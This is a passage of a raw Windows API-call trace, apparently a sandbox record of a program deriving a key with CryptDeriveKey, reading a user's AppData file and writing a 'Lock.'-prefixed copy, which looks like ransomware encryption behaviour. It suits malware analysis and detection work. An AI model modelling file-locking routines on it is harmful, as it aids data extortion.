lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0113.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0113.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.410] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.410] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa468, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0113.410] CryptHashData (hHash=0x9a4980, pbData=0x2a71c18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0113.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.410] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.410] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.410] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.410] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.410] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.411] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa330, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0113.411] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9a4980, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a43c0) returned 1 [0113.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.411] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.411] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0113.411] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.411] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0113.411] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0113.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0113.411] CryptDestroyHash (hHash=0x9a4980) returned 1 [0113.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0113.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0113.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0113.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0113.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/5sRVNiax4.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\5srvniax4.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0113.413] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.413] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0113.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0113.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0113.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0113.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0113.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0113.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0113.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.415] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0113.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abf418 [0113.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0113.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.5sRVNiax4.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.5srvniax4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0113.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0113.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0113.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0113.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0113.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0113.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0113.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0113.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0113.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cbb020 [0113.420] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0113.420] ReadFile (in: hFile=0x4b0, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0113.422] ReadFile (in: hFile=0x4b0, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x61dc, lpOverlapped=0x0) returned 1 [0113.422] ReadFile (in: hFile=0x4b0, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0113.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0113.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x161dc) returned 0x2a7a130 [0113.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cbb020 | out: hHeap=0x2af0000) returned 1 [0113.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0113.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0113.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0113.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0113.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0113.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x161dc) returned 0x37c0048 [0113.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0113.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0113.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0113.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0113.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0113.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x161dc) returned 0x2a7a130 [0113.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.429] HeapFree (in: 